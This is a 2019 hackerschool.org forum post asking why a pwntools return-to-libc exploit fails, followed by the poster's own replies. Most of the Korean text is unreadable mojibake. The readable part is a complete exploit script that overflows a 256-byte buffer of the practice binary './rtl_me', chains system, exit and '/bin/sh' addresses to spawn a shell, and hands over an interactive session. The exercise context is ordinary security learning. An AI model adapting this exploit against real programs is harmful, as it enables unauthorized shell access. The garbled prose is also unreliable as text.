½Ã½ºÅÛ ÇØÅ·

 1576, 1/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   turttle2s
   pwntools ¸¦ ÀÌ¿ëÇÑ exploit ÄÚµå Áú¹®

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1963 [º¹»ç]


RTL ±â¹ýÀ» pwntools ¸¦ ÀÌ¿ëÇØ exploit Äڵ带 ÀÛ¼ºÇغ¸·Á°í ÇÕ´Ï´Ù.
=== exp.py ===
from pwn import *
import os

p = process('./rtl_me')

system = 0xf7e1dd10
exit = 0xf7e10f70
ppr = 0x80484ea
shell_addr = 0xf7f5c8cf   # '/bin/sh' address

payload = 'A' * 260  # buf(256) + sfp(4)

payload += p32(system)
payload += p32(exit)
payload += p32(shell_addr)

p.send(payload)
sleep(0.5)
p.interactive()
==============

¹®Á¦´Â exp.py¸¦ ÀÌ¿ëÇÏ¸é ¼¼±×¸ÕÆ® ÆúÆ®°¡ ¶ß°í ½ºÅ©¸³Æ®¸¦ ÀÌ¿ëÇØ ÀÎÀÚ·Î ³ÖÀ¸¸é Àß ÀÛµ¿À» ÇÕ´Ï´Ù.Àú Äڵ忡 ¹¹°¡ ¹®Á¦°¡ ÀÖ´ÂÁö ¸ð¸£°Ú½À´Ï´Ù .
°í¼ö´Ôµé µµ¿ÍÁÖ¼¼¿ä ¤Ð¤Ð
  Hit : 2161     Date : 2019/06/07 09:45


    
turttle2s ÇØ°áÇß½À´Ï´Ù. ÇØ´ç ÄÚµå´Â stdin À϶§ ¸ÂÃç¼­ ÀÛ¼ºµÈ °ÍÀÌ°í, Á¦°¡ ¸¸µç ÇÁ·Î±×·¥Àº ÀÎÀÚ·Î Àü´ÞÇØÁà¾ßÇϱ⠶§¹®¿¡ ´Ù¸¥ ¹æ½ÄÀ» »ç¿ëÇØ¾ß ÀÛµ¿ÇÏ´Â Äڵ忴½À´Ï´Ù ¤Ð¤Ð Á˼ÛÇϺó´Ù... 2019/06/10  
turttle2s ¿Í.. ³»°¡ ÀÌ·¨±¸³ª.. ÁøÂ¥ ¸ÛûÇÏ³× 2019/08/21  
turttle2s ±¦Âú¾Æ ±×·² ¼ö ÀÖ¾î 2019/08/28